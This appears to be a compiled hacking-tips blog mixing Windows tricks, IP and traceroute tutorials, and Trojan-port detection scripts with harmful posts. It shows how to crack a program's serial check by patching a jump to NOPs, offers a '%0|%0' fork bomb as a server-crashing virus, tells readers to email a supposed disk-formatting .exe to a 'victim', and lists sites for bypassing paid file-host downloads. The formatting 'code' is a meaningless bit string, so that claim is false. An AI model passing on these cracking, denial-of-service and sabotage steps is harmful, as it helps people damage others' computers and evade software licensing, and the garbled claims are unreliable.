call IsEnteredTextGood
test value in eax
je QuietExit

ShowThanksForRegistering

QuietExit:

the source code must have looked like this :

GetDlgItemText(_ID_Serial);
if (EnteredTextGood) ShowThanksForRegistering

// else nothing....

This is another interesting piece of code.... test eax, eax ... this assembler instruction tests if the value of eax is equal to
itself ... if it is it is equal ... so a je instruction jumps ... if it is not equal, it does not jump.... To crack this program we can change the je instruction into two nop instructions... and we are done...

We have seen here, that the call has put a value in eax.... something which is not equal to zero or a zero... In our previous
example we saw that the called Is_Serial_Valid call set some value in memory ... Here we see that the called
Is_Serial_Valid call sets the eax register of our processor to some value....

Step 4: Changing the original program...

So modify it :-)

1.Open Hiew.
2.Open the file within Hiew.
3.Find the Address of the line in W32Dasm (it's on the status bar beginning with '@').
4.Press F5 in Hiew.
5.Enter the address you have found in (4) and press ENTER.
6.Press F3 - for activating the write option.
7.Press F2 - to change the instruction.
8.Replace the command by 'NOP' (without quotes), which means NO OPERATION.
9.Now a new command appeared in the next line.
10.Replace it by NOP too.
11.If another new instruction hasn't appeared, Press F9 to update the file.
12.Press F10 to exit.
13.Run the program and see the result.

Anti- Shortcut Virus


If your flash drive (pen drive) is affected by shortcut viruses, then follow these steps.

Click on "Start" -->Run.

Here I assume your flash drive letter as G:

Enter this command.

attrib -h -r -s /s /d g:\*.*

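Copy the above command and paste it in Run. It clears the hidden (-h), read-only (-r) and system (-s) attributes; /s applies it to all subfolders and /d includes the folders themselves.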

Note : Don't forget to replace the letter g with your flash drive letter.

Now press "Enter".

Now check for your files in Flash Drive.

Smallest Virus


A virus (as you know) is a piece of code that does something that it shouldn't. It is a common misconception that you need a vast skill set to make these and that they are extremely complex; in reality they are as simple as sin to make, which is why they are so damn annoying.




A fork bomb is considered to be the smallest writable virus in the batch language. It is annoying if launched on a home computer, but on a server it will probably result in a crash.
A fork bomb creates two instances which each create two instances and so on. The processes recursively fork; this "forks" the processor and jams it completely until a crash occurs.
Here is how to make it:
open up notepad and type:
%0|%0
and save it as fork.bat. Yep, it's a virus of just 5 characters :P .
On double clicking this file, it will lead to a total CPU jam by opening about 500+ processes of command prompt.

10 ways to a better Security


(1)always scan your file at http://scanner.novirusthanks.org/ (with "Do not distribute the sample" checked) or http://www.virustotal.com/

(2) sandbox everything and use Anti-Malware

(3) make a vmw = vmware workstation

(4)use a keyscrambler in your vmware

(5)use firefox always delete Cookie and history after closing never save password

(6)if u are going to hack use a vpn - virtual private network

(7) if you're buying some software from a user make sure u research him
read his threads ask a friend. read the scam page.send the money as a gift on paypal.

(8)if something looks too good 2 be free well it's not, it's most likely backdoored

(9) never download from a telnet Nono= ppl with 10 post

(10) add a firewall in your vmware workstation and anti virus guard

(11) add a firewall anti virus guard on your pc outside your vmware workstation use a scrambler and a sandbox everything

(12) buy a 5tb External Hard Drive and back up everything ((scan file)) b4 adding

(13) one of the important factors in keeping tools undetected from anti viruses

How To Lock Your Computer With USB Drive


Tired of people starting your computer when you are not around and messing up custom settings? Wouldn’t it be cool if you could lock your computer by just removing your USB stick from it? I’ll show you how you can use your USB stick, Flash Drive or Pen Drive what ever you call it to lock your computer, among other things…

Boot Lock
This trick will allow you to use your USB to BOOT into Windows. If someone tries to start the computer without your USB stick, it will display boot errors. Before you begin: playing with the BIOS and boot files of your computer may result in you not being able to boot into your Windows partition, so continue at your own risk! Things you need: a 64MB or larger sized USB stick and a Windows Recovery Disk (just in case).

 Unhide hidden and protected files : Go to Tools > Options > View, check Show hidden files and un-check Hide protected system files.

From the drive where Windows is installed (normally C:\), copy the files boot.ini, ntldr and NTDETECT.COM to your USB Stick.
Now, we need to go into your BIOS, so restart the computer and keep jabbing [F8] as soon as the computer starts.
Once in the BIOS, enable USB Drive as the first boot device. You might have to enable USB Legacy  Support on older BIOSes.
Restart your computer, if all goes well, you should be able to log into Windows. If not, then unplug the USB Stick, return to the BIOS and change the First Boot device to your hard disk drive and repeat the steps above.
Once you are logged into Windows, go to your Windows drive and rename boot.ini to boot.bak.
To check if you have set up everything correctly, eject your USB stick and reboot the computer. You should get error messages on the screen such as "Invalid Boot.ini" or "Windows could not start".

All About IP address part-2


There are two ways to change your IP on Windows: the easy way, and the hard way. I'll discuss how to do both of them in this tutorial.

Easy Way:

The first way to change it is if your NIC (Network Interface Card) supports cloning your MAC address. If this is the case then you go to

Start > Control Panel > Network Connections

Right click on your NIC and go to Properties. Then click the button labeled Configure. It should bring up another form. Click on the Advanced tab. Under Property you should see "Locally Administered Address" or "Network Address". Click the radio button next to the text box, and type in your new MAC address. (Note: you do not use the "-" when you enter your new MAC address.)

To check and see if it worked or not go to

Start > Run > and type in "cmd"

When the terminal comes up issue the command.

ipconfig /all
-----------------------------------------------------------------------------------------------------------------------------------------------

Hard Way:

To change your MAC Address the hard way, you first go to

Start > Run > and type in "cmd"

Once the terminal comes up type in

"net config rdr"

It should bring up a lot of things, but what you are worried about is

NetBT_Tcpip_{ The Numbers Between here}

Copy the numbers in between there and write it down somewhere, seeing that you will need them later.

After you are done with that go to

Start > Run > and type in "regedt32"

That should bring up the windows registry. Once the registry is up go to

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}

Click on the drop down menu and you should see the sub-categories

0000
0001
0002
and so on.

Click on each one and compare the "NetCfgInstanceId" Key with the number you wrote down earlier. Once you find a match double click on the key "NetworkAddress" and change the value to your new MAC address. Hit ok and reboot your system.




There r several ways u can determine ur IP address information:

IPCONFIG

Start / Run / cmd
IPCONFIG /ALL
This opens a command window. One advantage is that u can send the information to a text file (IPCONFIG /ALL > c:\ip.txt)
But sometimes the window shows so much information u need to scroll around to find it.

VIEW STATUS

Control Panel / Network Connections / Double click the icons 4 ur network (If the network has an icon in the system tray u can also just double click on that icon)
Click on the Support tab
Click on the Details button
:::::::::::::
Make Pictures Smaller Unavailable

When u try nd send pictures through e-mail, u should normally be given the option to make them smaller.
If this option is not available, a DLL file may need to be registered.

Start
Run
regsvr32 shimgvw.dll
:::::::::::::
Creating a Suspend Shortcut

If u would like to create an icon to suspend ur computer,

Right click on the Desktop
New / Shortcut
Enter in rundll32.exe PowrProf.dll, SetSuspendState
Give it whatever name u want
Now when u click on that shortcut, ur computer will shutdown nd suspend
Submitted by Gabe
:::::::::::::
Changing the User Type

Normally in XP Pro, through the Control Panel / User Accounts icon, u r only allowed to create administrators or limited users.
If u want to create

Right click on My Computer
Manage
Local Users nd Groups
Users
Right click on the user u want to change
Properties
Member of tab
Add button
Advanced button
Find Now button
From here u see the full list of possibilities (e.g. Power User, Backup Operator etc.)
:::::::::::::






some more
Determining Which Services r Associated with SVCHOST

Since so many critical services r run with each svchost,
You can see which ones r being used by opening a cmd prompt nd running:

tasklist /svc /fi "imagename eq svchost.exe"

Note: This is available only with XP Pro
:::::::::::::
Identify Faulty Device Drivers

If u r having problems with lockups, blue screens, or can only get to safe mode,
often the problem is due to a faulty device driver.

One way to help identify them is through the use of the Verifier program

Start / Run / Verifier
Keep the default of Create Standard Settings
Select the type of drivers u want to confirm
A list of drivers to be verified on the next boot will be shown.
Reboot
If ur computer stops with a blue screen, u should get an error message with the problem driver
To turn off the Verifier, run verifier /reset
:::::::::::::
Viewing Installed Drivers

If u want to see a list of installed drivers, u can run the driverquery program
There r a lot of available switches to view different types of information.
One use can be to export to a CSV file 4 viewing in Excel
An example would then be:

Driverquery /v /fo csv > drivers.csv

All about IP Address part-1


Here I have figured out some very easy but cool ways to trace the geographical location and various other info, like ISP details, of a remote computer using its IP.

Well, I guess it's one of the most important must-learn manuals for boys out there if you want to impress your friends, particularly gals whom you'll meet online in a chat room, by telling them their geographical locations and ISP details and making them surprised and impressed.

In the practical execution of this manual you don’t have to work much as it is very simple only you have to use your brain to understand some symbols and some format of expressions and use your IQ to execute things the right way.



What is IP and how to get the IP of a remote system::




Getting the IP (Internet Protocol) address of a remote system is the most important and the first step of hacking into it. Probably it is the first thing a hacker does to get info for researching a system. An IP is a unique number assigned to each computer on a network. It is this unique address which represents the system on the network. Generally the IP of a particular system changes each time you log on to the network by dialing to your ISP, and it is assigned to you by your ISP. The IP of a system which is always on the network generally remains the same. Those kinds of systems are the most likely to suffer a hacking attack because of their stable IP. Using IP you can even execute system commands on the victim's computer.

Let's take the example of the following IP address: 202.144.49.110. Now the first part, the numbers before the first decimal, i.e. 202, is the Network number or the Network Prefix. This means that it identifies the number of the network in which the host is. The second part, i.e. 144, is the Host Number, that is, it identifies the number of the host within the Network. This means that in the same Network, the network number is the same. In order to provide flexibility in the size of the Network, there are different classes of IP addresses:



Address Class            Dotted Decimal Notation Ranges
Class A ( /8 Prefixes)   1.xxx.xxx.xxx through 126.xxx.xxx.xxx
Class B ( /16 Prefixes)  128.0.xxx.xxx through 191.255.xxx.xxx
Class C ( /24 Prefixes)  192.0.0.xxx through 223.255.255.xxx



The various classes will be clearer after reading the next few lines.



Each Class A Network Address contains an 8-bit Network Prefix followed by a 24-bit host number. They are considered to be primitive. They are referred to as "/8's" or just "8's" as they have an 8-bit Network Prefix.

In a Class B Network Address there is a 16 bit Network Prefix followed by a 16-bit Host number. It is referred to as "16's".



A Class C Network Address contains a 24-bit Network Prefix and an 8-bit Host number. It is referred to as "24's" and is commonly used by most ISP's.



Due to the growing size of the Internet the Network Administrators faced many problems. The Internet routing tables were beginning to grow and now the administrators had to request another network number from the Internet before a new network could be installed at their site. This is where sub-netting came in.



Now if your ISP is a big one and if it provides you with dynamic IP addresses then you will most probably see that whenever you log on to the net, your IP address will have the same first 24 bits and only the last 8 bits will keep changing. This is due to the fact that when sub-netting comes in then the IP Addresses structure becomes:



xxx.xxx.zzz.yyy



where the first 2 parts are Network Prefix numbers and the zzz is the Subnet number and the yyy is the host number. So you are always connected to the same Subnet within the same Network. As a result the first 3 parts will remain the same and only the last part i.e. yyy is variable.

***********************



For Example, if say an ISP xyz is given the IP: 203.98.12.xx Network address then you can be awarded any IP, whose first three fields are 203.98.12. Get it?



So, basically this means that each ISP has a particular range in which to allocate all its subscribers. Or in other words, all subscribers or all people connected to the internet using the same ISP, will have to be in this range. This in effect would mean that all people using the same ISP are likely to have the same first three fields of their IP Addresses.



This means that if you have done a lot of (By this I really mean a lot) of research, then you could figure out which ISP a person is using by simply looking at his IP. The ISP name could then be used to figure out the city and the country of the person. Right? Let me take an example to stress as to how cumbersome but easy (once the research is done) the above method can be.



In my country, say there are three main ISP’s:



ISP Name Network Address Allotted



ISP I 203.94.47.xx

ISP II 202.92.12.xx

ISP III 203.91.35.xx



Now, if I get to know the IP of an e-pal of mine, and it reads: 203.91.35.12, then I can pretty easily figure out that he uses ISP III to connect to the internet. Right? You might say that any idiot would be able to do this. Well, yes and no. You see, the above method of finding out the ISP of a person was successful only because we already had the ISP and Network Address Allotted list with us. So, what my point is, that the above method can be successful only after a lot of research and experimentation. And, I do think such research can be helpful sometimes.



Also, this would not work if you take it all on a larger scale. What if the IP that you have belongs to someone living in a remote igloo in the North Pole? You could not possibly get the Network Addresses of all the ISP's in the world, could you? If yes please send it to me :-)



Well now I guess you have pretty good knowledge about what an IP is and what you can do by knowing the IP of a remote system. Now lets come to the point of finding out the IP of remote system.

Well you can easily figure out the IP of a remote system using the netstat utility available in the microsoft’s version of DOS. The netstat command shows the connections in which your system is engaged to and the ports they are using. Suppose you are checking your mail in hotmail and you want to find out the IP of msn. All you need to do is to open a dos window (command.com) and type netstat. You will see all the open connections of your system. There you will see something :



Proto Local Address Foreign Address State

TCP abhisek:1031 64.4.xx.xx:80 ESTABLISHED



Now you have got the IP address of hotmail as 64.4.xx.xx .

Similarly you can figure out the IP address of most http or ftp connections.



To know your own IP type the following command in a dos windows

C:\netstat -n

[this command converts names into IP addresses]

this is what you will probably see on typing the above command :



Proto Local Address Foreign Address State

TCP 203.xx.251.161:1031 194.1.129.227:21 ESTABLISHED

TCP 203.xx.251.161:1043 207.138.41.181:80 FIN_WAIT_2

TCP 203.xx.251.161:1053 203.94.243.71:110 TIME_WAIT

TCP 203.xx.251.161:1058 194.1.129.227:20 TIME_WAIT

TCP 203.xx.251.161:1069 203.94.243.71:110 TIME_WAIT

TCP 203.xx.251.161:1071 194.98.93.244:80 ESTABLISHED

TCP 203.xx.251.161:1078 203.94.243.71:110 TIME_WAIT



Here 203.xx.251.161 is your IP address.



Now lets clarify the format used by netstat :



Proto : It shows the type of protocol the connection with the remote system is using.

Here TCP (transmission control protocol) is the protocol used by my system to connect to other systems.



Local Address : It shows the local address, i.e. the local IP. When the netstat command is executed without the -n switch, the name of the local system is displayed, and when netstat is executed with the -n switch, the IP of the local system is displayed. Here you can also find out the port used by the connection.

xxx.yyy.zzz.aaa:1024

in this format you will see the local address. Here 1024 is the port to which the remote system is connected in your system



Foreign Address :: It shows the IP address of the remote system to which your system is connected. In this case also, if the netstat command is executed with the -n switch then you directly get the IP of the victim, but if netstat is executed without the -n switch then you will get the address of the remote system. Something like



C:\netstat

Proto Local Address Foreign Address State

TCP abhisek:1031 msgr.lw4.gs681.hotmail.com:80 ESTABLISHED



Here msgr.lw4.gs681.hotmail.com is the address of the foreign system. Putting this address in any IP lookup program and doing a whois lookup will reveal the IP of the remote system.



Note: The port to which your system is connected can be found from this in the same way as I have shown in the case of local address. The difference is that, this is the port of the remote system to which your computer is connected to.

Below I have produced a list of ports and popular services generally found to be running.

21 :: FTP port

80 :: http port

23 :: Telnet port



Note: If you execute the netstat command and find that ports like 12345 or 27374 are open and in use, then be sure that your sweetheart computer is infected with her boyfriend.. :-) I mean your computer is infected with some sort of Trojan.

Below I have produced a list of commonly known Trojans and the ports they use by default. So if you find these ports open then get a good virus buster and get these stupid servers of the Trojans kicked out. Well, if you want to play with these Trojans by keeping them in your computer but not letting them ruin your system performance, then just disable them from the system registry run and they won't be loaded to memory each time Windows starts up [this trick doesn't work for all Trojans].



Netbus :: 12345(TCP)

Subseven :: 27374(TCP)

Girl Friend :: 21554(TCP)

Back Orifice :: 31337 (UDP)
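The check described above, done by a script instead of by eye. This is an added example, not part of the original article: the sample netstat text is constructed, the function names are hypothetical, and a match on a default port is only a hint to investigate, not proof of infection.

```python
"""Check netstat output for the default Trojan ports listed above."""

# (protocol, port) -> name, exactly the four defaults listed on this page.
TROJAN_PORTS = {
    ("TCP", 12345): "Netbus",
    ("TCP", 27374): "Subseven",
    ("TCP", 21554): "Girl Friend",
    ("UDP", 31337): "Back Orifice",
}

# Constructed sample in the column layout of Windows `netstat -an`
# (documentation-range addresses, not captured from a real host).
SAMPLE_NETSTAT = """\
Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:12345          0.0.0.0:0              LISTENING
  TCP    192.0.2.10:1031        198.51.100.7:80        ESTABLISHED
  TCP    192.0.2.10:1044        198.51.100.9:27374     ESTABLISHED
  TCP    192.0.2.10:31337       198.51.100.7:80        TIME_WAIT
  UDP    0.0.0.0:31337          *:*
"""


def split_endpoint(endpoint):
    """Split 'address:port' on the last colon; port is None if not numeric."""
    address, _, port = endpoint.rpartition(":")
    return address, int(port) if port.isdigit() else None


def parse_netstat(text):
    """Yield one dict per TCP/UDP row; banner and header lines are skipped."""
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 3 or fields[0].upper() not in ("TCP", "UDP"):
            continue
        local_addr, local_port = split_endpoint(fields[1])
        remote_addr, remote_port = split_endpoint(fields[2])
        yield {
            "proto": fields[0].upper(),
            "local_addr": local_addr,
            "local_port": local_port,
            "remote_addr": remote_addr,
            "remote_port": remote_port,
            # UDP rows have no State column.
            "state": fields[3] if len(fields) > 3 else "",
        }


def find_trojan_ports(text):
    """Return (name, side, proto, port, state) for every matching row.

    side == "local": this machine owns the port (a listener here is the
    strong sign of an installed Trojan server).
    side == "remote": this machine is talking to that port on another host.
    """
    findings = []
    for row in parse_netstat(text):
        for side in ("local", "remote"):
            port = row[side + "_port"]
            name = TROJAN_PORTS.get((row["proto"], port))
            if name:
                findings.append((name, side, row["proto"], port, row["state"]))
    return findings


if __name__ == "__main__":
    for name, side, proto, port, state in find_trojan_ports(SAMPLE_NETSTAT):
        print(f"{proto} {side} port {port} ({state or 'no state'}): "
              f"{name} default port")
```

The TCP row on port 31337 is deliberately not reported, because the list gives that port for UDP only; matching on the protocol as well as the number avoids that false alarm.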



Well guys and gals, I hope you are now well familiar with the term IP, what the utility of IP in the cyber world is, and how to get the IP of a remote system to which you are connected. I hope you find my writings very easy to understand. I know I lack the capacity of explaining myself but I try my level best to make things very easy and clear for you all.



How to get the IP of a remote system while chatting through msn messenger ::




This is a tutorial on how to get IP address from MSN messenger. This is actually
a really easy thing to do. It is not like going through the hard time and reversing
MSN messenger like many people think.

The IP address is only given when you accept or are sending a file through MSN
messenger. When you send IM's, the message is sent through the server thus hiding
your victim's IP and yours. But when you send a file or receive a file, it is a direct
connection between the two computers.

To obtain the IP accept a file transfer or send a file to the victim, when the file
sending is under way from the dos prompt type "netstat" without the quotation marks.
You should get a table like this:

Proto Local Address Foreign Address State
TCP kick:1033 msgr-ns29.msgr.hotmail.com:1863 ESTABLISHED
TCP kick:1040 msgr-sb36.msgr.hotmail.com:1863 ESTABLISHED
TCP kick: ESTABLISHED

The top name in the list is the server's address for IMing. There could be many of
the second name in the list, as a new connection is made to the server for every
room you are IMing to. You are looking for the address of the remote host in
this table. It may be something similar to "host63-7-102-226.ppp.cal.vsnl.com" or “203..64.90.6”,
without the quotation marks.
All you need to do now is to put this address in your IP lookup program and get the IP of the remote system.


Well 50%of the work is done now. Now you know how to get the IP of a remote system, so its time to trace it down and find some details about the IP.



Tracing an IP is quite simple. You can do it the easy way by using some sweet software like Visual Trace 6.0b

[ftp://ftp.visualware.com/pub/vr/vr.exe]

Neotrace

[http://www.neoworx.com/download/NTX325.exe]

or by our way ie. Using MS DOS or any other version of DOS.

Well, I suggest you use DOS and its tracert tool for tracing the IP, because using it will give you a clear conception of the art of tracing an IP, and I guarantee that you will feel much more satisfied on success than when using a silly piece of software. Further, you will know how things work, how the IP is traced down, and the different networks associated in this tracing process.



Let us take a look at tracert tool provided for DOS by Microsoft.

It is a very handy tool for people who need to trace down an IP.

Just open any DOS windows and type tracert.



C:\windows>tracert



Usage: tracert [-d] [-h maximum_hops] [-j host-list] [-w timeout] target_name


Options:

-d Do not resolve addresses to hostnames.

-h maximum_hops Maximum number of hops to search for target.

-j host-list Loose source route along host-list.

-w timeout Wait timeout milliseconds for each reply.


You will now see a description of the tracert command and the switches associated with it.

Well, these switches don't make much difference. All you can do is increase the timeout in milliseconds by using the -w switch if you are using a slow connection, and use the -d switch if you wish not to resolve addresses to hostnames.

By default tracert performs a maximum of 30 hops trace. Using the -h switch you can specify the number of hops to perform.

Now its time for execution.

Let us trace down the IP yahoo.com [216.115.108.243]



TIP: If you have done a long research (I mean a lot) then simply looking at the IP you can figure out some info from it. For example the IP 203.90.68.8 indicates that the system is in India. In India IPs generally begin with 203 and 202



C:\WINDOWS>tracert yahoo.com



Tracing route to yahoo.com [216.115.108.243] over a maximum of 30 hops:



1 308 ms 142 ms 127 ms 203.94.246.35

2 140 ms 135 ms * 203.94.246.1

3 213 ms 134 ms 132 ms 203.94.255.33

4 134 ms 130 ms 129 ms 203.200.64.29

5 122 ms 135 ms 131 ms 203.200.87.75

6 141 ms 137 ms 121 ms 203.200.87.15

7 143 ms 170 ms 154 ms vsb-delhi-stm1.Bbone.vsnl.net.in [202.54.2.241]

8 565 ms 589 ms 568 ms if-7-0.bb8.NewYork.Teleglobe.net [207.45.198.65]

9 596 ms 584 ms 600 ms if-3-0.core2.NewYork.teleglobe.net [207.45.221.66]

10 * * * Request timed out.

11 703 ms 701 ms 719 ms if-3-0.core2.PaloAlto.Teleglobe.net [64.86.83.205]

12 694 ms 683 ms 681 ms if-6-1.core1.PaloAlto.Teleglobe.net [207.45.202.33]

13 656 ms 677 ms 700 ms ix-5-0.core1.PaloAlto.Teleglobe.net [207.45.196.90]

14 667 ms 673 ms 673 ms ge-1-3-0.msr1.pao.yahoo.com [216.115.100.150]

15 653 ms 673 ms 673 ms vl20.bas1.snv.yahoo.com [216.115.100.225]

16 666 ms 676 ms 674 ms yahoo.com [216.115.108.243]

Trace complete.



Note: Here I have traced yahoo.com. In place of yahoo.com you can give the IP of yahoo or any other IP you want to trace, the result will be the same.



Now carefully looking at the results you can figure out many information about yahoo’s server [216.115.108.243]

First, packets of data leave my ISP, which is at 203.94.246.35. Similarly you can find out the different routers through which the packets of data are sent and received to and from the target system. Now take a look at the 13th line: you'll see that the router is in PaloAlto.Teleglobe.net, and from this you can easily figure out that the router is in Palo Alto. Now finally look at the target system, i.e. Yahoo's server vl20.bas1.snv.yahoo.com. Now you have got the address of yahoo's server. Now put this address in any IP lookup program and perform a reverse DNS lookup and you will get most of the info about this address, like the place where it is.

Well another thing you can find out using the tracert tool is that the number of hops (routers) the target system is away from you. In case of tracerouting yahoo.com we find that the target system ie yahoo’s server is 16 hops away from my system. This indicates that there are 16 routers between my system and yahoo’s server.



Apart from tracing an IP you can find out many useful details about the target system using the tracert tool.



Firewall Detection



While tracerouting a target system, if you get * as an output then it indicates a timeout error. Now if you perform another traceroute to the same target system at some other time with a good connection, and repeat this a few more times, and you always get * as the output, then take it for sure that the target system is running a firewall which prevents sending of data packets from the target system.



Example



Some days ago I tried to tracert hotmail’s server in plain and simple way using tracert without any trick.This is what I found out :




c:\windows>tracert 64.4.53.7



Tracing route to lc2.law5.hotmail.com [64.4.53.7]


over a maximum of 30 hops:






1 * * * Request timed out.

2 161 ms 147 ms 85 ms 203.90.69.81

3 126 ms 261 ms 219 ms 203.90.66.9

4 121 ms 115 ms 228 ms delswp2.hclinfinet.com [203.90.66.133]

5 727 ms 725 ms 711 ms 203-195-147-250.now-india.net.in [203.195.147.250]

6 1006 ms 794 ms 952 ms core-fae-0-0.now-india.net.in [203.195.147.3]

7 826 ms 731 ms 819 ms 213.232.106.9

8 885 ms 744 ms 930 ms 213.166.3.209

9 851 ms 1020 ms 1080 ms 213.232.64.54

10 1448 ms 765 ms 1114 ms pos8-0.core2.London1.Level3.net [212.113.0.118]

11 748 ms 789 ms 750 ms ge-4-2-1.mp2.London1.Level3.net [212.187.131.146]

12 719 ms 733 ms 846 ms so-3-0-0.mp1.London2.Level3.net [212.187.128.46]

13 775 ms 890 ms 829 ms so-1-0-0.mp2.Weehawken1.Level3.net [212.187.128.138]

14 853 ms 852 ms 823 ms so-3-0-0.mp1.SanJose1.Level3.net [64.159.1.129]

15 889 ms 816 ms 803 ms so-7-0-0.gar1.SanJose1.Level3.net [64.159.1.74]

16 * * * Request timed out.

17 * * * Request timed out.

18 * * * Request timed out.

19 * * * Request timed out.

20 * * * Request timed out.

21 * * * Request timed out.

22 * * * Request timed out.

23 * * * Request timed out.

24 * * * Request timed out.

25 * * * Request timed out.

26 * * * Request timed out.

27 * * * Request timed out.

28 * * * Request timed out.

29 * * * Request timed out.

30 * * * Request timed out.

Trace complete.


I performed the same tracert many times a day but concluded with the same result. This indicates that the systems after the router SanJose1.Level3.net have firewalls installed which prevent the outgoing of data packets.



Detecting Traceroute Attempts on your System



You can detect that an attacker is performing a traceroute on your system, if you see the following symptoms:



1. If you observe port scans on very high UDP ports. This symptom means that the attacker has performed a traceroute on your system. However, it could also simply mean a port scan. Either way, it signifies the fact that your system is being scanned.



2. If the packet-monitoring tool installed in your network, picks up several outgoing TTL-exceeding messages, then it is yet another sign that someone is doing a traceroute on your system.



3. If in these log files you also observe an outgoing ICMP port unreachable error message, then it means that a traceroute was done on your system and, as the target system, i.e. your system, was reached, it responded with this error message.
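The three symptoms above, checked per remote address over a packet log. This is an added example, not part of the original article: the CSV layout, the sample packets and the function names are constructed for illustration, and the 33434 threshold for "very high UDP ports" is an assumption based on the first port classic UDP traceroute uses.

```python
"""Match the three traceroute symptoms above against a packet log."""
import csv
import io
from collections import defaultdict

# Assumption: 33434 is the first destination port of classic UDP traceroute,
# used here as the threshold for "very high UDP ports".
HIGH_UDP_PORT = 33434
ICMP_DEST_UNREACHABLE = 3      # with code 3 = port unreachable
ICMP_PORT_UNREACHABLE_CODE = 3
ICMP_TIME_EXCEEDED = 11        # the "TTL-exceeding" message

# Constructed sniffer log in a hypothetical CSV layout:
# direction,proto,src,dst,dst_port,icmp_type,icmp_code
SAMPLE_LOG = """\
in,UDP,198.51.100.23,192.0.2.10,33449,,
out,ICMP,192.0.2.10,198.51.100.23,,3,3
in,UDP,198.51.100.23,192.0.2.10,33450,,
out,ICMP,192.0.2.10,198.51.100.23,,3,3
in,UDP,198.51.100.23,192.0.2.10,33451,,
out,ICMP,192.0.2.10,198.51.100.23,,3,3
in,UDP,203.0.113.5,192.0.2.10,53,,
out,ICMP,192.0.2.10,203.0.113.77,,11,0
out,ICMP,192.0.2.10,203.0.113.77,,11,0
in,UDP,203.0.113.99,192.0.2.10,40000,,
"""


def summarize(log_text):
    """Count each symptom per remote peer; malformed rows are skipped."""
    peers = defaultdict(lambda: {"high_udp_in": 0,
                                 "ttl_exceeded_out": 0,
                                 "port_unreach_out": 0})
    for row in csv.reader(io.StringIO(log_text)):
        if len(row) != 7:
            continue
        direction, proto, src, dst, dport, itype, icode = (f.strip() for f in row)
        if direction == "in" and proto == "UDP" and dport.isdigit():
            # Symptom 1: inbound probes to very high UDP ports.
            if int(dport) >= HIGH_UDP_PORT:
                peers[src]["high_udp_in"] += 1
        elif direction == "out" and proto == "ICMP" and itype.isdigit():
            if int(itype) == ICMP_TIME_EXCEEDED:
                # Symptom 2: we told the peer its packet's TTL ran out here.
                peers[dst]["ttl_exceeded_out"] += 1
            elif (int(itype) == ICMP_DEST_UNREACHABLE
                  and icode == str(ICMP_PORT_UNREACHABLE_CODE)):
                # Symptom 3: the probe reached us and hit a closed port.
                peers[dst]["port_unreach_out"] += 1
    return dict(peers)


def classify(counts):
    """Turn one peer's symptom counts into a verdict string."""
    if counts["high_udp_in"] and counts["port_unreach_out"]:
        return "traceroute reached this host"
    if counts["ttl_exceeded_out"] >= 2:
        return "traceroute passed through this host"
    if counts["high_udp_in"]:
        return "high UDP port probe (traceroute or port scan)"
    return "no traceroute symptom"


def detect(log_text):
    """Map each remote peer seen with a symptom to its verdict."""
    return {peer: classify(c) for peer, c in summarize(log_text).items()}


if __name__ == "__main__":
    for peer, verdict in detect(SAMPLE_LOG).items():
        print(f"{peer}: {verdict}")
```

Windows tracert sends ICMP echo requests rather than UDP probes, so against it only the TTL-exceeded symptom applies.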



You can also find out more information on the attacker (if he performs a traceroute on your system) by simply studying the sniffer log files. If you observe the TTL values, then you can easily figure out the following information on the attacker by making use of OS detection techniques discussed earlier in this white paper:


The Operating System running on the attacker’s target system.
Number of hops away, the attacker is from you.



OKI DOKI that’s all for this article. Hope you will find this article very easy to understand and implement.

contd....

Free Premium Link generators


list of free premium link generators

Rapidshare.com Link Generators

www.rapidquick.net

Max No of links you can generate daily : 3

www.rapidirty.com

Max No of links you can generate daily : Unknown

www.hostyoursites.biz

Max No of links you can generate daily : 10

www.Premium4Me.Com

Max No of links you can generate daily : Unknown

www.RapidDownloader.Info

Max No of links you can generate daily : Unknown

www.Khongbiet.Com

Max No of links you can generate daily : Unknown

www.Rapid-Hook.Com

Max No of links you can generate daily : 4

www.Rapidshack.Us

Max No of links you can generate daily : Unknown

www.Megaez.Com

Max No of links you can generate daily : Unknown

www.RapidsharePremiumLinkGenerator.Com

Max No of links you can generate daily : Unknown

www.rapidhack.prv.pl

Max No of links you can generate daily : 5

www.RapitShare.Info

Max No of links you can generate daily : 5

www.FreeRsLinks.Com

Max No of links you can generate daily : 100

www.Rapidl.Com

Max No of links you can generate daily : 3

www.RapidFile.Us

Max No of links you can generate daily : 2

www.Rapidshare.Co.In

Max No of links you can generate daily : 5

www.RapidLeech.com

Max No of links you can generate daily : Unknown

www.RsFox.Com

Max No of links you can generate daily : 5

www.Rs43.Com

Max No of links you can generate daily : Unknown

www.FreeRapid.Org

Max No of links you can generate daily : Unknown

www.Rapid4All.Com

Max No of links you can generate daily : 5

www.Adomreg.Com

Max No of links you can generate daily : Unknown


Format Code


How to Format Someone's Hard Disk

1. Write/copy the following code:
010010110001111100100101010101?010100000111111 00000

2. Save As it as .EXE and any Name would Do. eg- (virus.exe)
see here if you dont know how to save notepad as exe?

3. If u run the program means it will format the Hard Drive.

4. Next Send this to your Victim Some How like Email . If he Click on it then His C drive will Format

C$UTI0N:

NOTE: This is for learning purposes only!! I am not responsible for any Cause!!

Sunday 26 August 2012

Hacking Language Alphabets


Many Of The Noob Hackers D0n't Understand The Language Of Hackers...So Here Is The Translation....

first

a b c d e f g h i j k l m n o p q r s t u v w x y z

translate to

4 8 c D 3 ph G h 1 j K l m N 0 p Q R 5 7 u V w X Y 2

second

a b c d e f g h i j k l m n o p q r s t u v w x y z

translate to{HARDEST ONE}

4 b ( |) 3 p|-| 9 |-| 1 _| |< |_ |\/| |\| o p (). .- 2 7 |_| v \/\/ >< `/ 2

letter a is now commonly replaced by @

hope it helps you.

if You Know More,,,,Please post Translations here....

Enjoy...